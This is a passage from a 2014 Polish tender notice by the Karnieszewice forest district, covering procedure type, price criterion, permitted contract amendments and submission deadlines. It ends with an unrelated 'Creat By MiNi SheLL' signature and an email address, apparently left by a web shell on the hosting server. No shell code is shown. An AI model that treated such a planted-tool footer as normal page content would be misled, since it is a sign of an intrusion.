<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących zakresach:
1. Zamawiający przewiduje możliwość zmiany ceny ofertowej:
a) w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki,
b) w przypadku rezygnacji z części zamówienia wynikającej z zaistnienia okoliczności powodującej, że wykonanie jej nie leży w interesie publicznym,
2. Zamawiający przewiduje możliwość zmiany terminu wykonania zamówienia:
a) przypadku udzielenia Wykonawcy zamówienia dodatkowego lub uzupełniającego w oparciu o art. 67 ust. 1 ustawy PZP, jeśli jego wykonanie (sposób, technologia) będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego; 
b) w przypadku wstrzymania robót budowlanych w wyniku działania siły wyższej, potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia
c) jeżeli w czasie obowiązywania umowy wystąpią wybitnie niesprzyjające warunki pogodowe uniemożliwiające realizację zadania np.: długotrwałe opady atmosferyczne, 
d) przypadku zaistnienia okoliczności niezależnych od Wykonawcy                   a w szczególności w przypadku istotnych błędów w dokumentacji projektowej, kolizji z niezinwentaryzowanymi sieciami podziemnymi, konieczności prowadzenia prac wykopaliskowych itp.
3. W przypadku powyższych okoliczności może nastąpić zmiana terminu zakończenia robót lub wynagrodzenia należnego Wykonawcy. 
4. Nowy termin wykonania zamówienia ustali Zamawiający po negocjacjach     z Wykonawcą.
5. Zamawiający w razie wstrzymania robót z przyczyn, za które wykonawca nie odpowiada, obowiązany jest do:
a) dokonania odbioru robót przerwanych oraz do zapłaty wynagrodzenia za roboty, które zostały wykonane do dnia odstąpienia,
b) przejęcie od Wykonawcy terenu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/nadl_karnieszewice/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Karnieszewice, Trawica 8A, 76-004 Sianów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2014 godzina 10:00, miejsce: Nadleśnictwo Karnieszewice, Trawica 8A, 76-004 Sianów, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com